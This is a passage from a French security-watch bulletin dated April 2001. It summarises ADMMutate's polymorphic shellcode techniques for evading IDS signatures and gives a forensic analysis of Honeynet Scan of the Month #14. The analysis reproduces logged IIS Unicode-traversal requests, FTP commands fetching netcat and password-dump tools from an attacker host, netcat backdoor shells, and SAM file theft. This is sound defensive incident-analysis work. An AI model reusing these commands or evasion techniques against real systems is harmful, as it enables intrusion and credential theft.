'ADMMutate' permet de modifier la forme d'un code binaire (dit ShellCode) sans pour autant modifier ses<br />
fonctionnalités. En considérant qu'une grande partie des tentatives d'intrusion s'appuient sur une vulnérabilité de type<br />
'débordement de buffer' nécessitant la transmission d'un code binaire destiné à être exécuté sur le système attaqué,<br />
un tel outil permettra d'échapper à la majorité des systèmes d'IDS utilisant une stratégie de recherche d'une<br />
signature.<br />
Cette stratégie de camouflage n'est pas nouvelle et il est étonnant qu'elle n'est pas été mise plus tôt sur la place<br />
publique. Utilisée depuis plus de 8 ans par les virus dits 'Polymorphiques', elle a conduit les éditeurs de produits<br />
anti-virus à devoir faire rapidement évoluer leurs produits comme nous le précisions précédemment.<br />
Quatre techniques sont ainsi employées dans le cadre de l'écriture de codes malicieux de type Virus:<br />
1. Le réordonnancement de <strong>cert</strong>aines fonctions commutatives:<br />
L'ordre d'exécution de <strong>cert</strong>aines fonctions est indifférent.<br />
Les codes associés peuvent donc être déplacés.<br />
MOV EAX, EBX 89D8 MOV EAX, EBX 89CA<br />
MOV EDX, ECX 89CA MOV EDX, ECX 89D8<br />
2. Le réordonnancement de la distribution du code:<br />
Les fonctions sont chaînées et peuvent être<br />
réordonnancées selon un processus bien spécifique.<br />
F1 (JUMP F2)<br />
F1 (JUMP F2)<br />
F2 (JUMP F3)<br />
F3 (JUMP F4)<br />
F3 (JUMP F4)<br />
F2 (JUMP F3)<br />
F4 (JUMP F5)<br />
F4 (JUMP F5)<br />
3. L'utilisation d'instructions équivalentes:<br />
Les instructions utilisées sont modifiées par leurs<br />
équivalents logiques. La taille de l'instruction peut<br />
cependant changer<br />
MOV AX, 0 B80000 XOR AX, AX 31C0<br />
MOV AX, 0 B80000 SUB AX, AX 29C0<br />
ADD CX, #1 83C101 INC CX<br />
41<br />
4. Le chiffrement à clef aléatoire<br />
Les instructions utilisées sont chiffrées en utilisant une<br />
clef aléatoire modifiée à chaque génération et stockée<br />
en tant que données dans le code. La routine de<br />
chiffrement/déchiffrement pourra être dissimulée par<br />
utilisation des techniques précédentes<br />
A B C D F G H I J<br />
B C A D G F I H J<br />
APOGEE Communications - © B.VELLE<br />
A B C D F G H I J<br />
A C H I F B G D J<br />
APOGEE Communications - © B.VELLE<br />
<strong>Veille</strong> <strong>Technologique</strong> <strong>Sécurité</strong> N°33 Page 41/59<br />
© APOGEE Communications - Tous droits réservés Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE<br />
A := 0<br />
APOGEE Communications - © B.VELLE<br />
B := B * 2 C := C + 1 IF D > 1 THEN<br />
A := A - A B := B
Avril 2001<br />
ftp://adm.freelsd.net/pub/ADM<br />
http://www.ktwo.ca/c/ADMmutate-0.7.3/README<br />
http://www.ktwo.ca/c/ADMmutate-0.7.3.tar.gz<br />
NTATTACK - HONEYNET SCAN OF THE MONTH<br />
Description<br />
Parfait complément de la rubrique 'Today's GIAC Detect', le projet 'HoneyNet -Scan of the Month' offre<br />
décidément une source inépuisable d'informations à qui sait en tirer parti. En conséquence, nous vous proposons les<br />
résultats de notre travail d'analyse du défi N°14. Celui-ci porte sur une attaque détectée en février sur le serveur<br />
NT 'lab.wiretrip.net', en réalité un attrape-mouche. Les seules informations fournies consistent en un fichier binaire<br />
contenant la journalisation de l'attaque réalisée avec l'outil Snort.<br />
La première étape vise à rendre intelligibles les données journalisées au format 'tcpdump'. En temps normal, l'outil<br />
Snort sera mis à contribution pour générer un fichier contenant un format directement lisible. Ce fichier pourra être<br />
lui-même retraité par l'utilitaire 'SnortSnarf' qui permet la génération de pages HTML navigables. Une autre solution<br />
consiste à utiliser le remarquable analyseur réseau multi-protocole 'EtherReal' qui dispose d'une fonction d'import et<br />
de visualisation supportant plus de 10 formats dont le format tcpdump. Nous avons opté pour cette dernière solution<br />
qui autorise une analyse totalement autonome et en temps différé sur un système NT.<br />
Le fichier binaire chargé dans EtherReal contient 6310 enregistrements, chaque enregistrement correspondant à un<br />
paquet transmis sur le réseau. Face à cette quantité de données, et sans autres informations, la première étape de<br />
l'analyse consiste à identifier rapidement les grandes lignes de l'attaque puis à mettre en évidence les échanges<br />
suspects. L'objectif est d'éliminer au plus vite le bruit généré par les échanges licites ou sans intérêt. La seconde<br />
étape visera à comprendre, par le détail, l'attaque, c'est à dire la succession d'événements ayant conduit à<br />
potentiellement compromettre le système cible. Enfin, une synthèse pourra être établie qui permettra de quantifier<br />
sans erreur l'atteinte réelle et de définir les mesures de protection et de reprise d'activité.<br />
Plusieurs techniques vont être successivement détaillées, l'objectif étant de montrer qu'aucune de ces techniques ne<br />
peut se suffir à elle-même. Le temps d'analyse est précisé à titre purement indicatif.<br />
Analyse de niveau "Chaîne" (Durée approximative: 20mn)<br />
Avant même d'engager une analyse approfondie des traces, l'utilisation de quelques outils rudimentaires, mais très<br />
efficaces, peut permettre de mettre en évidence rapidement <strong>cert</strong>ains éléments caractéristiques d'une attaque.<br />
Identification<br />
Une simple recherche des chaînes de caractères visualisables menée avec un éditeur binaire ou avec l'utilitaire<br />
'strings', disponible en environnement UNIX mais aussi NT, permet de visualiser <strong>cert</strong>ains éléments pertinents de<br />
l'attaque et d'identifier immédiatement les techniques utilisées. Attention, l'environnement NT supportant le codage<br />
UNICODE (caractères codés sur 16bits soit 2 octets), l'utilisation de la version NT de 'strings' est fortement<br />
conseillée !<br />
La recherche des chaînes de caractères UNICODE (strings snort-0204@0117.log) donne un premier<br />
ensemble d'indices:<br />
Strings snort-0204@0117.log.gz | more (extraits significatifs du résultat de la commande)<br />
Select * from Customers where City='<br />
shell("cmd /c echo werd >> c:\fun")
Avril 2001<br />
GET /guest/default.asp/..<br />
../..<br />
../..%AF../..%C0%AF../boot.ini HTTP/1.1
Avril 2001<br />
La recherche du mot ' GET ' permet de lister les commandes passées en exploitant la vulnérabilité 'UNICODE'<br />
dont nous pouvons constater quelles sont similaires aux commandes précédentes !<br />
strings -a snort-0204@0117.log.gz | find "GET" (les doublons ont été éliminés de cet extrait)<br />
GET /guest/default.asp/..%C0%AF../..%C0%AF../..%C0%AF../boot.ini HTTP/1.1<br />
GET /guest/default.asp/..<br />
GET /guest/default.asp/..%C0%AF../..%C0%AF../..%C0%AF../fun HTTP/1.1<br />
GET /msadc/..%C0%AF../..%C0%AF../..%C0%AF../winnt/system32/cmd.exe?/c+copy+C:\winnt\system32\<br />
cmd.exe +cmd1.exe HTTP/1.1<br />
GET /msadc/..%C0%AF../..%C0%AF../..%C0%AF../program%20files/common%20files/system/msadc/cmd1.exe<br />
?/c+echo+open+213.116.251.162+>ftpcom HTTP/1.1<br />
GET /msadc/..%C0%AF../..%C0%AF../..%C0%AF../program%20files/common%20files/system/msadc/cmd1.exe<br />
?/c+echo+johna2k+>>ftpcom HTTP/1.1<br />
GET /msadc/..%C0%AF../..%C0%AF../..%C0%AF../program%20files/common%20files/system/msadc/cmd1.exe<br />
?/c+echo+haxedj00+>>ftpcom HTTP/1.1<br />
GET /msadc/..%C0%AF../..%C0%AF../..%C0%AF../program%20files/common%20files/system/msadc/cmd1.exe<br />
?/c+echo+get+nc.exe+>>ftpcom HTTP/1.1<br />
GET /msadc/..%C0%AF../..%C0%AF../..%C0%AF../program%20files/common%20files/system/msadc/cmd1.exe<br />
?/c+echo+get+pdump.exe+>>ftpcom HTTP/1.1<br />
GET /msadc/..%C0%AF../..%C0%AF../..%C0%AF../program%20files/common%20files/system/msadc/cmd1.exe<br />
?/c+echo+get+samdump.dll+>>ftpcom HTTP/1.1<br />
GET /msadc/..%C0%AF../..%C0%AF../..%C0%AF../program%20files/common%20files/system/msadc/cmd1.exe<br />
?/c+echo+quit+>>ftpcom HTTP/1.1<br />
GET /msadc/..%C0%AF../..%C0%AF../..%C0%AF../program%20files/common%20files/system/msadc/cmd1.exe<br />
?/c+ftp+-s:ftpcom HTTP/1.1<br />
GET /msadc/..%C0%AF../..%C0%AF../..%C0%AF../program%20files/common%20files/system/msadc/cmd1.exe<br />
?/c+nc+-l+-p+6969+-e+cmd1.exe HTTP/1.1<br />
Analyse de niveau "Réseau" (Durée approximative: 4 heures, tableau de synthèse compris)<br />
Pour aller plus en avant, l'analyse doit maintenant porter sur le contenu de chacun des paquets et nécessite donc<br />
l'utilisation d'EtherReal et des mécanismes de filtrages associés mais aussi une bonne 'dose' de patience pour<br />
démêler les fils de l'écheveau !<br />
Sources<br />
Quatre sites dignes d'intérêt sont rapidement identifiés:<br />
www.nether.net, portail d'un fournisseur de comptes Internet gratuits<br />
1Cust162.tnt13.stk3.da.uu.net (213.116.251.162), point d'accès du fournisseur UUNET<br />
freedu-12-26.libertysurf.se (212.139.12.26), point d'accès du fournisseur libertysurf<br />
ip60-156.hksp.net (202.85.60.156), dont le domaine appartient à une société basée à Hong Kong<br />
Notons que les systèmes situés derrière ces deux dernières adresses dynamiques sont totalement contrôlés par<br />
l'attaquant.<br />
Protocoles<br />
Un simple tri sur la colonne 'protocole' permet d'obtenir très rapidement une 'cartographie' des protocoles utilisés.<br />
Ce tri met en évidence la présence de six protocoles -<br />
HTTP, FTP, Diameter, X25 et Socks, Netbios -<br />
dont trois sont, a priori, inattendus. Force est de<br />
constater que les paquets associés proviennent pour<br />
la plupart du site à l'origine des connexions HTTP<br />
transportant les attaques 'VBA Shell' et 'UNICODE':<br />
1Cust162.tnt13.stk3.da.uu.net<br />
Diameter [Paquet 0548]<br />
X25 [Paquet 4030]<br />
L'analyse du contenu des paquets montre que celuici<br />
est en réalité une requête HTTP POST contenant<br />
une attaque ! Rien ne permet d'identifier la cause de<br />
l'erreur: erreur de l'attaquant ou erreur de<br />
journalisation due à Snort.<br />
Socks [Paquets 5995 … 6059]<br />
Ici tout laisse supposer qu'il s'agit d'une connexion<br />
licite ou d'un leurre destiné à masquer le sondage<br />
des accès Socks. Les requêtes sont effectuées depuis<br />
un accès PPP swbell.net.<br />
Un second tri utilisant les fonctionnalités de filtrage permet de suivre le cheminement des connexions HTTP et FTP<br />
(filtre: 'http.request or ftp.request'). Les commandes passées sur le système attaqué via les vulnérabilités 'VBA<br />
Shell' et 'UNICODE' peuvent alors être étudiées en détail.<br />
Attaques<br />
<strong>Veille</strong> <strong>Technologique</strong> <strong>Sécurité</strong> N°33 Page 44/59<br />
© APOGEE Communications - Tous droits réservés Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Avril 2001<br />
Une synthèse commentée de la succession des principaux événements est proposée dans le tableau suivant établi à<br />
la suite d'une analyse des échanges menée en deux temps:<br />
- Parcours rapide et non directif ayant pour objectif d'identifier les grandes phases de l'attaque et les éléments<br />
associés: sources, protocoles, données caractéristique. Le tableau de synthèse est initialisé.<br />
- Parcours détaillé des trois grandes phases précédemment identifiées après élimination du bruit au moyen de<br />
filtres plus ou moins complexe: connexions licites, activités non liées au cœur de l'attaque. Le tableau est<br />
complété et affiné.<br />
Les trois phases identifiées sont dénommées, ci-après, 'Incident'.<br />
HEURE: 09h16<br />
INCIDENT N°1 Une attaque est perpétrée depuis l'adresse 1Cust162.tnt13.stk3.da.uu.net<br />
Méthode Paquet Commande Commentaire<br />
UNICODE 117 Lecture BOOT.INI OK à la 4 ième variation<br />
HTTP 130 Sondage présence MSADC Erreur de frappe<br />
HTTP 140 Sondage présence MSADC pour attaque VBAShell MSADC est présent,<br />
HTTP 149 Sondage Fonction MSADC AdvancedFactory.Query Signature ADM!ROX!YOUR!WORLD<br />
UNICODE 161 DIVERS Sondage type de système<br />
VBAShell 182<br />
201<br />
220<br />
239<br />
258<br />
277<br />
296<br />
299<br />
340<br />
- Shell(cmd /c echo johna2k > ftpcom)<br />
- Shell(cmd /c echo hacker2000 >> ftpcom)<br />
- Shell(cmd /c echo get samdump.dll >> ftpcom)<br />
- Shell(cmd /c echo get pdump.exe >> ftpcom)<br />
- Shell(cmd /c echo get nc.exe >> ftpcom)<br />
- Shell(cmd /c quit>> ftpcom)<br />
- Shell(cmd /c fto -s ftpcom -n www.nether.net)<br />
Exécution du script et connexion FTP<br />
- Shell(cmd /c pdump.exe >> new.pass)<br />
Délai 10s Un délai pour garantir la bonne terminaison du programme<br />
VBAShell 359<br />
378<br />
397<br />
416<br />
435<br />
- Shell(cmd /c echo johna2k > ftpcom2)<br />
- Shell(cmd /c echo hacker2000 >> ftpcom2)<br />
- Shell(cmd /c put new.pass >> ftpcom2)<br />
- Shell(cmd /c quit>> ftpcom2)<br />
- Shell(cmd /c fto -s ftpcom2 -n www.nether.net)<br />
Première tentative visant à rapatrier des<br />
outils sur le système cible. L'attaque est<br />
infructueuse, l'authentification étant<br />
rejetée par www.nether.net<br />
Récupération des mots de passe acquis<br />
lors de l'étape précédente. Bien entendu,<br />
le fichier n'existe pas et la connexion ftp<br />
reste infructueuse, l'authentification étant<br />
toujours rejetée par www.nether.net<br />
Délai 18s Le temps de constater que le fichier n'est pas présent sur le compte johna2k ?<br />
VBAShell 518 - Shell(cmd /c fto 213.116.251.162) Vérification de la connectivité<br />
Diameter 548 - Shell(cmd /c echo open 213.116.251.162 > ftpcom) Une erreur de codage du paquet !<br />
VBAShell 567<br />
586<br />
605<br />
624<br />
643<br />
662<br />
681<br />
- Shell(cmd /c echo johna2k > ftpcom)<br />
- Shell(cmd /c echo hacker2000 >> ftpcom)<br />
- Shell(cmd /c echo get samdump.dll >> ftpcom)<br />
- Shell(cmd /c echo get pdump.exe >> ftpcom)<br />
- Shell(cmd /c echo get nc.exe >> ftpcom)<br />
- Shell(cmd /c quit>> ftpcom)<br />
- Shell(cmd /c fto -s ftpcom)<br />
Seconde tentative visant à rapatrier des<br />
outils sur le système cible. Le fichier<br />
ftpcom est incomplet et ne contient pas<br />
l'adresse du site ftp !<br />
L'attaquant ne passe pas aveuglément à la<br />
seconde étape consistant à lancer l'un des<br />
programmes chargés car il contrôle le<br />
système situé derrière 213.116.251.162<br />
Délai 1mn05s Le temps de constater qu'aucune connexion ftp n'est établie depuis la machine attaquée<br />
VBAShell 700 - Shell(cmd /c open 213.116.251.162) Une erreur de codage manifeste<br />
719 - Shell(cmd /c echo johna2k >> sasfile)<br />
Troisième tentative sur un autre site dans<br />
738 - Shell(cmd /c echo haxedj00 >> sasfile)<br />
un ordre légèrement différent mais encore<br />
757 - Shell(cmd /c echo get pdump.exe >> sasfile)<br />
avec une erreur. La commande initiale<br />
776 - Shell(cmd /c echo get samdump.dll >> sasfile)<br />
devrait être:<br />
795 - Shell(cmd /c echo get nc.exe >> sasfile)<br />
echo open 213.116.251.162 > sasfile<br />
813 - Shell(cmd /c quit>> ftpcom)<br />
et non<br />
832 - Shell(cmd /c fto -s ftpcom)<br />
open 213.116.251.162<br />
Délai 1mn29s La connexion ftp n'est toujours pas établie par la machine attaquée<br />
VBAShell 851 - Shell(cmd /c open 213.116.251.162) Cela devient lassant !<br />
870 - Shell(cmd /c echo johna2k >> sasfile)<br />
Troisième tentative sur un autre site dans<br />
888 - Shell(cmd /c echo haxedj00 >> sasfile)<br />
un ordre légèrement différent mais<br />
906 - Shell(cmd /c echo get pdump.exe >> sasfile)<br />
toujours avec la même erreur !<br />
924 - Shell(cmd /c echo get samdump.dll >> sasfile)<br />
943 - Shell(cmd /c echo get nc.exe >> sasfile)<br />
962 - Shell(cmd /c quit>> ftpcom)<br />
981 - Shell(cmd /c fto -s ftpcom)<br />
Délai 38s Rapide changement de stratégie. L'attaquant n'a pas compris l'origine du problème 'ftp' !!<br />
UNICODE 991-4 cmd.exe /c copy c:\winnt\system32\cmd.exe cmd1.exe Le comportement de l'attaquant est<br />
1004-7 cmd1.exe echo open 213.116.251.162 > ftpcom<br />
décidément incompréhensible: toutes les<br />
1017-20 cmd1.exe echo johna2k >> ftpcom<br />
attaques UNICODE sont transmises en<br />
1030-33 cmd1.exe echo haxedj00 >> ftpcom<br />
utilisant quatre variations, la dernière<br />
1042-45 cmd1.exe echo get nc.exe >> ftpcom<br />
étant acceptée. Pourtant, les résultats de<br />
1054-57 cmd1.exe echo get pdump.exe >> ftpcom<br />
la tentative d'acquisition du fichier<br />
1067-70 cmd1.exe echo get samdump.dll >> ftpcom<br />
'boot.ini' [Paquet 117] permettaient<br />
1080-83 cmd1.exe echo quit >> ftpcom<br />
d'identifier la bonne variation. Une seule<br />
1092-95 cmd1.exe fto -s ftpcom<br />
hypothèse: l'attaquant utilise un script<br />
1100 Exécution du script et connexion FTP<br />
qu'il ne maîtrise pas ! Un 'professionnel'<br />
1109 - Transfert nc.exe<br />
aurait adapté ce script afin de minimiser<br />
1202 - Transfert pdump.exe<br />
les traces et d'optimiser l'attaque !<br />
1266 - Transfert samdump.dll<br />
Durée 2s L'attaquant n'attend pas la fin des transferts pour engager la seconde phase de l'attaque<br />
UNICODE 1233-36 cmd1.exe nc -l -p 6969 cmd1.exe Activation d'un accès caché sur TCP/6969<br />
<strong>Veille</strong> <strong>Technologique</strong> <strong>Sécurité</strong> N°33 Page 45/59<br />
© APOGEE Communications - Tous droits réservés Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Avril 2001<br />
Durée 8s A partir de cet instant, l'attaquant attaque sur 2 fronts en maintenant la connexion ouverte<br />
NC 6969 1342 Ouverture connexion TCP port 6969<br />
Accès distant sur le système<br />
1345 - 'dir'<br />
Localication de pdump.exe<br />
UNICODE 1361 cmd.exe /c c:\xxxx\xxx\msadc\pdump.exe >> yay.txt Récupération des mots de passe<br />
NC 6969 1371 - 'dir' (plusieurs fois)<br />
Contrôle du résultat de pdump.exe<br />
1398 - 'del ftpcom'<br />
Effacement du fichier de commande<br />
1411 - 'dir'<br />
Contrôle du résultat de pdump.exe<br />
1430 - 'type readme'<br />
????<br />
UNICODE 1444 cmd.exe /c c:\xxxx\xxx\msadc\pdump.exe >> yay.txt Nouvelle tentative<br />
Durée 1mn03s Désormais, l'attaquant travail en mode interactif mais n'est pas sûr de lui !<br />
NC 6969 1458 -'c:'<br />
Commande erronée<br />
1462 - 'cd \'<br />
Retour à la racine<br />
1466 - 'dir'<br />
Visualisation du répertoire<br />
1479 - 'rm'<br />
Erreur, on n'est pas sous UNIX !<br />
1489 - 'del fun'<br />
Destruction d'un fichier inexistant<br />
1493 - 'dir'<br />
On vérifie<br />
1506 - 'cd exploites'<br />
Déplacement vers un répertoire inexistant<br />
1510 - 'dir'<br />
On vérifie<br />
1521 - 'cd exploits' 'dir'<br />
On parcours les différents répertoires<br />
1544 - 'cd microsoft' 'dir' 'cd exploits'<br />
Et on atteint le rythme de croisière<br />
1562 - 'cd newfile' 'dir' 'cd ..'<br />
1582 - 'cd unix' 'dir' 'cd ..'<br />
1605 - 'cd ..' 'dir'<br />
De retour à la racine<br />
UNICODE 1623 cmd.exe /c c:\xxxx\xxx\msadc\pdump.exe >> yay.txt Nouvelle tentative<br />
Durée 2mn08s De très nombreuses erreurs confirment l'inexpérience ou la nervosité de l'attaquant<br />
NC 6969 1633 - 'dir'<br />
Contrôle du résultat de pdump.exe<br />
1642 - 'dir ..' 'dir'<br />
En se trompant à plusieurs reprises<br />
1660 - 'cat yay.txt'<br />
Il ne s'agit pas d'un système UNIX<br />
1668 - 'type yay' 'type aya.txt'<br />
Mais bien d'un système NT<br />
1691 - 'net session' [Access denied]<br />
Visualisation des connexions NetBios<br />
1702 - 'net users'<br />
Visualisation des comptes locaux<br />
Durée 2mn33s L'attaquant est persuadé disposer de privilèges supplémentaires via l'attaque UNICODE !!!<br />
UNICODE 1734 cmd.exe /c net session >> yay2.txt<br />
Nouvelle tentative de visualisation Netbios<br />
1753 cmd.exe /c net session >> yay2.txt<br />
Incrédulité ou naïveté<br />
NC 6969 1765 - 'dir'<br />
Contrôle du résultat<br />
1782 - 'type aya2.txt'<br />
Le fichier a été crée mais ne contient rien<br />
1799 - 'del aya2.txt'<br />
Destruction des traces (quid de 'yay.txt' !)<br />
1826 - 'net session > yay3.txt'<br />
Quelle persévérance<br />
1849 - 'dir' 'del yay&.*'<br />
Destruction laborieuse des traces<br />
1866 - 'del yay.*'<br />
Cannot …. Used by another process' !!!<br />
1885 - 'del yay3.txt' 'dir'<br />
Not found. La tension monte …<br />
UNICODE 1905 cmd.exe /c net user >> heh.txt<br />
Oubli, le résultat est déjà connu<br />
1992 cmd.exe /c net user >> c:\heh.txt<br />
Durée 31s Les actions suivantes se répètent avec toujours de nombreuses erreurs de frappe.<br />
UNICODE …..<br />
Durée 1mn08s L'attaquant ne peut s'empêcher de signer son 'forfait' !<br />
NC 6969 2085 echo Hi, i know that this a is a lab server but patch the Tout exploit doit être signé sinon à quoi<br />
holes ! :-) >> README.NOW.Hax0r<br />
bon se fatiguer..<br />
Durée 4mn35 Il tente de créer 2 utilisateurs déjà déclarés en utilisant l'aide en ligne !<br />
NC 6969 2187 'net group ?'<br />
Une bonne dizaine de tentatives pour<br />
2203 'net group /?'<br />
arriver à visualiser les groupes déclarés !<br />
UNICODE 2320 cmd.exe /c net localgroup DomainsAdmins WAM_KENNY Et toujours de multiples erreurs en<br />
2339 /ADD<br />
cmd.exe /c net localgroup DomainsAdmins IUSR_KENNY<br />
/ADD<br />
voulant créer un compte privilégié !<br />
NC 6969 2401 'net local group domains admins'<br />
Idem en interactif. L'attaquant semble<br />
2445 'net localgroup adm inistrators'<br />
découvrir les subtilités de l'administration<br />
UNICODE 2452 cmd.exe /c net localgroup Administrators IUSR_KENNY /ADD Et toujours de multiples erreurs en<br />
2471 cmd.exe /c net localgroup Administrators WAM_KENNY /ADD voulant créer un compte privilégié !<br />
NC 6969 2506 'net localgroup administrators' On contrôle le résultat en interactif<br />
Durée 2mn28 Les actions suivantes visent à parcourir le système avec de nombreuses erreurs<br />
NC 6969<br />
…..<br />
2773 'ps u'<br />
Toujours et encore UNIX<br />
2786 'pdump.exe'<br />
….<br />
[Failed to open LSA]<br />
Une explication du problème rencontré !<br />
Durée 6mn25 Une nouvelle tentative de création d'un compte est effectuée<br />
UNICODE 2814 cmd.exe /c net user testuser UgotHacked /ADD<br />
2833 cmd.exe /c net localgroup Administrators testuser /ADD<br />
NETBIOS 2840 NETBIOS over TCP Tentative de connexion<br />
NC 6969 2903 'net users'<br />
…<br />
Hélas, le compte n'a pas été créé<br />
2949 'net users hi guy /add'<br />
…<br />
Encore une tentative sans succès<br />
2980 'net password'<br />
…<br />
Une commande inexistante<br />
3055 'net user himan Har Har666 /ADD'<br />
Une nouvelle tentative qui échoue<br />
Durée 17s Finalement, l'attaquant efface (presque) toutes ses traces<br />
<strong>Veille</strong> <strong>Technologique</strong> <strong>Sécurité</strong> N°33 Page 46/59<br />
© APOGEE Communications - Tous droits réservés Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Avril 2001<br />
NC 6969 3149<br />
3163<br />
'del samdump.dll'<br />
'del pdump.exe'<br />
Ici encore, de nombreuses commandes<br />
erronées sont passées<br />
Durée 6mn54s Puis tente de récupérer le contenu de la base de sécurité dont les mots de passe<br />
NC 6969 3196 'cd repair'<br />
Le répertoire de backup<br />
'rdisk /s'<br />
De multiples appels sans succès à 'rdisk'<br />
3282 'cat'<br />
Toujours et encore UNIX<br />
3295 'type sam._' [Access Denied]<br />
Une tentative désespérée !<br />
UNICODE 3328 cmd.exe /c rdisk -s<br />
L'attaquant ne sait plus comment faire !<br />
3348 cmd.exe /c rdisk<br />
Et teste différentes syntaxes après avoir<br />
3392 cmd.exe /c rdisk -s /<br />
visualisé à plusieurs reprises le répertoire.<br />
3434 cmd.exe /c rdisk /s -<br />
Un essai avec un mécanisme UNIX<br />
3527 cmd.exe /c type c:\winnt\repair\sam._ >> c:\har.txt<br />
Pour enfin aboutir au résultat<br />
NC 3640 'exit' Déconnexion par arrêt de l'interpréteur<br />
Durée 2mn17s L'attaquant tente de récupérer le fichier via une nouvelle connexion sur le port TCP/6968<br />
UNICODE 3747 cmd1.exe nc -l -p 6968 cmd1.exe Activation d'un accès caché sur TCP/6968<br />
NC 6968 3920 'copy c:\har.txt c:\InetPub\wwwroot' Copie du fichier sous la racine WEB<br />
HTTP 3927 GET /har.txt Et récupération réussie du fichier<br />
NC 6968 3950 'del har.txt' Destruction de la copie sous la racine WEB<br />
Durée 3mn22s L'attaquant réussi à détruire la copie du fichier à la racine du serveur après plusieurs<br />
tentatives en mode interactif et indirect.<br />
NC 6968<br />
Il s'acharne - plus de 15 essais - à tenter de détruire le fichier déjà éliminé car il oublie de changer de<br />
UNICODE<br />
répertoire !<br />
Durée 35s Les volumes disques existant sont ensuite systématiquement recherchés<br />
NC 6968 4095 'd:'<br />
Tentative de changement de volumes<br />
4100 'e:'<br />
portant sur volumes fixes (c: à f:) mais<br />
4128 'f:'<br />
aussi amovibles (a:, b:) !<br />
4144 'a:' 'b:'<br />
Durée 15s L'attaquant finit par se déconnecter puis réactive deux portes masquées<br />
NC 6968 4192 'exit' Déconnexion par arrêt de l'interpréteur<br />
UNICODE 4223-26 cmd1.exe nc -l -p 6968 cmd1.exe Activation d'un accès caché sur TCP/6968<br />
UNICODE 4233-36 cmd1.exe nc -l -p 6868 cmd1.exe Activation d'un accès caché sur TCP/6868<br />
Durée Quelques attaques continuent durant l'Incident N°2<br />
UNICODE 4367-70 Lecture BOOT.INI [OK]<br />
Opération déjà effectuée au tout début<br />
4381-84 Lecture READ.NOW.Hax0r [Not found]<br />
L'attaquant ne se souvient plus du nom<br />
4397-00 Lecture READ.me.NOW.Hax0r [Not found]<br />
donné il y a 1/2 heure (paquet 2085) !<br />
HEURE: 14h20<br />
INCIDENT N°2 Une attaque est perpétrée depuis l'adresse depuis l'adresse ip60-156.hksp.net<br />
Méthode Paquet Commande Commentaire<br />
Durée 4mn19s Il se connecte sur TCP/6868 et immédiatement réengage un parcours des répertoires<br />
NC 6868 4238<br />
4295<br />
4288<br />
4298<br />
'dir'<br />
'mkdir test'<br />
'type hart.txt'<br />
Parcours des répertoires. Aucune faute de<br />
frappe ou erreur ne peut être notée !<br />
Durée 20mn58s L'attaquant annonce qu'il a faire à un honey pot et continue à parcourir le système<br />
NC 6868 4351<br />
4552<br />
4971<br />
5173<br />
5204<br />
'echo best honey pot i've seen till now :) > rfp.tx<br />
'type README.NOW.Hax0r'<br />
'mdir test'<br />
'copy default.htm default.html'<br />
'echo >> default.htm'<br />
Lit le fichier signant la première attaque<br />
Commet une seule erreur<br />
Sauvegarde la page d'accueil<br />
Et ajoute une ligne à l'original<br />
Durée 15s L'attaquant finit par se déconnecter<br />
NC 6868 5536 'exit' Déconnexion par arrêt de l'interpréteur<br />
HEURE: 14h50<br />
INCIDENT N°3 Reprise des attaques perpétrées depuis l'adresse 1Cust162.tnt13.stk3.da.uu.net<br />
Méthode Paquet Commande Commentaire<br />
Durée 8s Un grand silence: quelques connexions WEB et quelques 'pings' puis de nouveau:<br />
UNICODE 5286 cmd.exe /c copy c:\winnt\system32\cmd.exe cmd1.exe Copie d'un interpréteur<br />
Durée 52s Il transfère un fichier d'archive<br />
HTTP 5302-6<br />
5317-20<br />
5348-52<br />
5362-66<br />
5375-79<br />
cmd1.exe echo open 213.116.251.162 > ftpcom<br />
cmd1.exe echo johna2k >> ftpcom<br />
cmd1.exe echo put c;\wiretrip\whisker.tar.gz >> ftpcom<br />
cmd1.exe echo quit >> ftpcom<br />
cmd1.exe fto -s ftpcom<br />
L'attaquant place un fichier de commande<br />
ftp visant à rapatrier une archive<br />
contenant whisker sur son système !<br />
FTP 5379 Initialisation du Transfert FTP<br />
Durée 1mn59s Se ménage un point d'entrée<br />
UNICODE cmd1.exe nc -l -p 6969 cmd1.exe Activation d'un accès caché sur TCP/6969<br />
FTP 5736 Fin du Transfert FTP<br />
Durée 43s Détruit les traces<br />
HTTP 5766-69 cmd1.exe del ftpcom On efface les traces<br />
A partir de cet instant aucune autre activité anormale n'est journalisée<br />
Analyse de niveau "Session" (Durée approximative: 2 heures avec les résultats précédents)<br />
<strong>Veille</strong> <strong>Technologique</strong> <strong>Sécurité</strong> N°33 Page 47/59<br />
© APOGEE Communications - Tous droits réservés Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Avril 2001<br />
Certains outils, dont EtherReal proposent une fonction permettant de reconstituer le flux des données échangées sur<br />
une session TCP/IP. L'analyste peut alors suivre aisement le déroulement des actions ce qui simplifie l'investiguation.<br />
Dans le cas présent, cette approche permet de confirmer <strong>cert</strong>aines hypothèses mais reste limitée, une grande partie<br />
des attaques utilisant une multitude de flux HTTP.<br />
Session Incident N°1 - TCP/6969<br />
Le lecteur qui aura le courage de lire la transcription de cette session ne manquera pas de noter les nombreuses<br />
erreurs de frappe et l'utilisation systématique de la commande 'dir'. Il comprendra pourquoi l'attaquant est obligé de<br />
déconnecter la session: il tente de visualiser un fichier binaire contenant des caractères de contrôles qui engendrent<br />
un dysfonctionnement du terminal ! Notons que pour conserver une transcription lisible et d'une taille raisonnable,<br />
les résultats des commandes 'dir' ne sont pas tous affichés.<br />
<strong>Veille</strong> <strong>Technologique</strong> <strong>Sécurité</strong> N°33 Page 48/59<br />
© APOGEE Communications - Tous droits réservés Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Avril 2001<br />
Microsoft(R) Windows NT(TM)<br />
(C) Copyright 1985-1996 Microsoft Corp.<br />
C:\Program Files\Common Files\system\msadc>dir<br />
Volume in drive C has no label.<br />
Volume Serial Number is 8403-6A0E<br />
Directory of C:\Program ……<br />
02/04/01 06:41a .<br />
02/04/01 06:41a ..<br />
09/25/97 07:41a 596 adcjavas.inc<br />
09/25/97 07:41a 589 adcvbs.inc<br />
04/30/97 11:00p 208,144 cmd1.exe<br />
02/04/01 06:41a 98 ftpcom<br />
09/25/97 08:28a 172,816 msadce.dll<br />
09/25/97 08:16a 5,632 msadcer.dll<br />
